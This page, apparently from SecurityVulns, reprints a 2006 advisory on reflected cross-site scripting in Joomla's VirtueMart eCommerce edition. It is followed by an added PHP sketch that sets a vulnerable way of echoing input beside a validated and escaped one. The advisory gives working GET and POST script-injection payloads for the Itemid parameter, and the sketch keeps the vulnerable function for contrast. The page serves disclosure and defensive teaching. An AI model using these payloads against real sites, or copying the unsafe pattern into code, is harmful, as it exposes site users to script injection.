Information Security


Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  [SA22122] PhotoStore Cross-Site Scripting Vulnerabilities

  [SA22092] Opial Audio/Video Download Management Cross-Site Scripting

  [SA22117] eyeOS Cross-Site Scripting Vulnerabilities

  Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

From: Base64 <base640_(at)_gmail.com>
Date: September 28, 2006
Subject: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro
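
Added example (not part of the original advisory, and not Joomla or VirtueMart source code): a sketch of the input validation and output escaping that closes this class of bug. It assumes Itemid is a numeric menu item ID that is echoed back into an HTML attribute, as the `">` breakout in the payload suggests. The function names are hypothetical.

```php
<?php
// Added illustration; not Joomla or VirtueMart source code.
// Assumption: Itemid is a non-negative integer ID that the page reflects
// into an HTML attribute value.

/** Return Itemid as an int, or 0 when the value is not purely digits. */
function clean_itemid($raw): int
{
    // Rejects arrays (Itemid[]=x), empty strings, signs, markup and
    // values too long to be a plausible ID.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return 0;
    }
    return (int) $raw;
}

/** Vulnerable pattern: request value copied into an attribute unescaped. */
function hidden_field_unsafe(string $raw): string
{
    return '<input type="hidden" name="Itemid" value="' . $raw . '" />';
}

/** Hardened pattern: validate on input, then escape on output as well. */
function hidden_field_safe($raw): string
{
    $id = clean_itemid($raw);
    return '<input type="hidden" name="Itemid" value="'
        . htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8') . '" />';
}

// Constructed sample inputs: the advisory's payload, a normal ID, an array.
$samples = ['"><script>alert(\'XSS\');</script>', '42', ['nested']];
foreach ($samples as $s) {
    echo 'input:  ', is_array($s) ? '(array)' : $s, PHP_EOL;
    if (is_string($s)) {
        echo 'unsafe: ', hidden_field_unsafe($s), PHP_EOL;
    }
    echo 'safe:   ', hidden_field_safe($s), PHP_EOL, PHP_EOL;
}
```

With the advisory's payload as input, the unsafe function closes the attribute and emits the script element, while the safe function emits `value="0"`.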

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod